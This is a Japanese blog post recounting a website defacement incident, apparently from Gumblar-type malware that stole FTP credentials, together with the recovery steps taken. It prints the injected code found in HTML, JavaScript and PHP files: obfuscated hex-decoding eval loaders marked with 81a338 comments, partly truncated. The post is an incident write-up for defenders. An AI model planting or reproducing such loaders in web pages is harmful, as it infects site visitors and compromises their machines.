WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

ヤフー プラグイン やしろ塾 量産 Diamond Affiliate Masters Program MasterCollection 新井浩 KMS認証 HTML4.0 三橋美仁 バナー 転売大園塾 サンタ クラウド入力機能 アフィ匠 自動化 与沢翼×蝶乃舞 インターネットビジネススクール CGI IP getElementById DTD 復元 タイガーウイング 無料オファー シャンプー Line トレンドキーワード ネットビジネス大全集 株式会社バンザイ バイドゥー ブルートフォースアタック 高速ゲーム PPC プロファイル アレックス式ネオせどりスクール twitter ネットショップ ping 不正アクセス 株式会社WINGOOD Youtube wpXサーバー force puzzle office 切り抜き 改ざん 賢威 プロモーション 掲示板 ビジネス 伊藤 歩 コピーボタン 秒速で1億円稼ぐ男 フォローマティック 権利収入 ヤフオク Yahoo 定型文 ブロック エディタ 背景 スタイルシート 小笠原健一 ランキング functions.php ブラシ メモ 日本語入力変換ソフト 上位表示 大西良幸 ブラクラ document.all 関根義光 Favicon ぼかし パズル RSS 感染 インターネット 百度 スカイプ 大園式転売塾 BBIZ 音量アイコン Thunderbird 関根塾 トラフィック 北川 雅嗣 tool CS6 個人情報 .htaccess explorer 株式会社SRシステム 大園麗花 加工 立体 MovableTYpe ソフト Adobe エクスチェンジ テーマ ECサイト 株式会社A-ブログレス 伊藤 虎太郎 蝶乃舞 getElementByTagName エクスプローラー system wp-login.php FireWorks SmoothScroll.js Baidu クリックランキング Agency Business 情報商材 デスクトップ 改竄 html モザイク 中山秀人 特定のメールアドレス LinkShaker ウイルス ハート moza wordpress テンプレート アイコン 原田真 放射線 自己アフィリ ネットゲーム クロスアフィリエイト 特権ビジネス Firefox 個人情報流出 球体 レイアウト崩れ インペリアルゴールド クラック 登録禁止 サイト改ざん もざ Newpost Catch やしろひろたみ インフォトップ 伊藤虎太郎 IE 伊藤塾 マイクロソフト ライブチャット マニュアル 大園転売塾 画像 株式会社Free Agent Style ライン 無断送信 Internet Explorer 山下 ヤフーショッピング 自己アフィリエイト エキスパートメール Windows 7 短縮URL せどり ネオヒルズアカデミー Chrome フレンドシップメール ソース ネットビジネス最後の楽園 人物 ボタン JavaScript 宮田麗花 High Concept Marketing 表示 PHP ワードプレス 久積篤史 レンタルサーバー 既得権益 副業術 ロリポップ ping送信 81a338 ファビコン 村上省吾 脆弱性 google 株式会社SRシステム アフィリエイト SKナレッジ 比較 スムーズ スマホ SEO ネットガレージ WP 滑らか ざくざく君 配布 出店料 管理画面 与沢翼 バックアップ アンダーグラウンドメソッド android クラウド変換 グラデーション iphone followmatic YouTube Maniax 2017 EC XHTML 石井匠 アレックス IBS 秀吉塾天下統一 ソースコード Cash on Wordpress Ban Hammer インターネットエクスプローラー マルウエア 詐欺組織 SyntaxHighlighter カスタマイズ ネットビジネス Login LockDown 固定ページ 不正送信 アクセスアップ ライオンアフィリエイト アドセンス 流出 管理ツール 株式会社ニュース 切抜き MT 土屋ひろし メルマガ配信システム タスクバー ブラウザ 高額塾 優先順位 ツール トレンドアフィリエイト ツイッター レビュー 申請金ビジネス レイアウト ドメイン アクセス制限 アンダーグラウンドアフィリエイトクラブ ユーチューブマニアクス2017 レタープレス RMT BUYMA バイマ Extension Manager 自動 postpost 池田純矢 スクロール Windows リンクシェイカー がら空きビジネス RSS Includes Pages FTP Google Maps API Google Maps ウインドウ KMSpico セキュリティ Tiger-Wing WEB DOCTYPE ムーバブルタイプ 不労所得の神 短縮URLツール 詐欺 ブロックポリシー Wordpress Content Slide @PAGES 無料 css 加藤 秀吉 到達率 CS5

アーカイブ

エステトラブル

このページの先頭へ